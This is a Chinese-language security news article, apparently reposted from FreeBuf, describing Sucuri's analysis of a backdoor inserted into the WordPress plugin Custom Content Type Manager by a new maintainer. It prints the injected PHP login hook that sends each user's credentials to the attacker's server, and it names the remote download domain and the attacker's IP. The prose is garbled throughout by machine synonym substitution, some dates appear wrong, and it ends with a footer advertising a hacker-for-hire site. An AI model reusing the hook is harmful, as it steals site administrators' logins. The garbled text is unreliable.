WordPress 自定义内容类型办理插件(CCTM)存在后门,可盗取办理员账号密码
据悉, Sucuri安全团队研讨人员近来指出WordPress一款插件(自界说内容办理)CCTM存在后门。经过该后门,能够对WordPress上的中心文件进行篡改,以此记载并盗取感染站点办理员用户的登录账号及暗码。
Freebuf 百科
自界说内容办理( Custom Content Type Manager)插件的功用
自界说内容类型办理(CCTM)答应用户创立自界说内容类型(也称为文章类型),也能够对每个下拉菜单、复选框和图画甚至于其他元素,供给标准化的自界说区域,这赋予了WordPress内容办理的功用。这个插件还答应导出和导入用户的内容界说,使得它易于在多个站点之间确保相似的结构。
假设想为博客增加一个独自的部分来宣布电影谈论。经过运用自界说文章类型,你能够创立一种新的文章类型,就像文章(posts)和页面(pages)相同,它能够包含一组不同的数据。比方新的办理菜单、专门的修改页面、自界说分类 和 更多有用的发布办理功用。自界说文字类型 具有新的文章办理选项,就像默许的文章类型(文章、页面、附件 )相同。一种 自界说文章类型 能够存储各式各样的信息。它有专门的修改器、多媒体上传 并运用WordPress现有的表结构,便于数据办理。
后门的发现
此事情是由Sucuri安全团队(一个专门供给web安全服务的团队)初次进行追寻剖析的。据Sucuri安全研讨人员说到,
一开始他们是在其客户处发现一个命名古怪的文件 (auto-update.php),而起先并没发现有可疑行为,直到该插件进行更新的时分。
Sucuri安全团队说到当他们在为客户铲除一个感染站点时,发现了一个可疑的文件auto-update.php,该文件是被存放在wp-content/plugins/custom-content-type-manager/.的途径下。详细如下图,
据研讨剖析,该后门程序,能从一个地址为http://wordpresscore .com/plugins/cctm/update/ 的服务端下载文件,并将它们保存为.php格局存放在插件装备目录下。
该插件既是上述说到的 Custom Content Type Manager (CCTM),在曩昔三年里该插件首要用于创立自界说文章类型,现在现已积累了必定的用户数量,据初步统计现在现已在超越10,000个站点上装置了该插件。
插件疑云,奥秘的办理者
从 Sucuri安全团队两个星期的查询来看,该插件在曩昔的10个月将近一年看起来像一个被抛弃的项目,并无任何更新,但是近期奥秘地更换了办理者。而该名名为wooranker的新开发者随后更新了插件,发布了一个新的版别。
咱们在官方插件目录中找到的每一个WordPress插件,都是经过子版别存储库进行晋级的。在问题盯梢体系的协助下,任何人都能够运用该存储库去搜索相应的信息(包含像方针,时刻以及改变事项等)在恣意插件的恣意版别中。比方,下图为近期CCTM更改的状况,
咱们能够从上面截图看到,其间的一次更改是于2019年2月18日增加了auto-update.php文件。在此次更新中,“wooranker”改动并增加了下面的描述信息,
“新办理者的小改动”(保存原始语法)
实际上,从上述截图中咱们能够看到,两个星期前该插件依然由fireproofsocks在保持更新,但之后其间的一项变化的描述为“将wooranker增添到readme中”,再到后边就变成wooranker在对该插件进行更新了。
或许该插件开发者现已对其失掉爱好,又或许受雇于wooranker。另一方面,由于实际上fireproofsocks现已将近一年没对该插件进行更新了,咱们也估测是否 wooranke侵略了fireproofsocks的账户,随后增添了本身作为新的办理者。
此外,在2019年2月5日,wooranker也一起加入到 Postie插件项目中。而其在Postie插件项目的变化都为合法可查的,而且都由Postie插件的初始发起人赞同。这一切看起来却有点令人摸不清脑筋。那么接下来让咱们来看看更新的歹意CCTM插件及wooranker 怎么运用它侵略站点的。
自界说内容办理(CCTM)插件 0.9.8.8 版别存在歹意代码
而该名开发者关于更新的版别赋予了其新的“使命”。首要,新的版别如上述所看到的,增加了auto-update.php的文件,而据研讨剖析,该文件可从长途的服务器下载指定文件到受感染的站点。
经过Trac咱们也看到了(于2月19日最终更新)。它增加了/includes/CCTM_Communicator.php文件(该文件会与auto-update.php联合运转,其首要的使命为ping wooranker的服务器端然后使得服务器能记载新感染的站点IP地址等信息。)以及将下述的代码段刺进到插件的index.php文件中。
// Send plugin information when user loginfunction _wp_login_eventhandler($user_login, $user) {require_once('includes/CCTM_Communicator.php');$_objCCTMCom = new CCTM_Communicator();$_objCCTMCom->addInfo(array($user_login, $user));$_objCCTMCom->send_info();}add_action('wp_login', '_wp_login_eventhandler', 10, 2);
详细更改如下图,
该段代码作用为每逢用户登录到WordPress站点时,将站点及用户的信息发送到wooranker的服务器(wordpresscore .com)上。
进犯途径重演
经过在受感染的站点上拜访登陆,完成对进犯的回溯。
于2月28日,从源地址104.131.27.120发起了测验运用Python脚本 (“python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-79-generic“)登录到WordPress。该站点的地址明显地经过新的CCTM_Communicator功用来获取的。
依据对受感染站点的监测,某次 wooranker妄图登陆到一个受感染的站点,但由于站点办理员更改了登陆的URL,所以 wooranker未能成功侵略站点。随后看到测验登陆受阻,wooranker也随即更改了战略。其使用auto-update.php后门,强制方针站点下载并装置别的一个名为c.php的文件,该文件首要用于创立另一名为wp-options.php的文件。后者首要用于篡改WordPress的中心文件。据研讨发现,遭受篡改的首要有三个文件,
[1] [2] 黑客接单网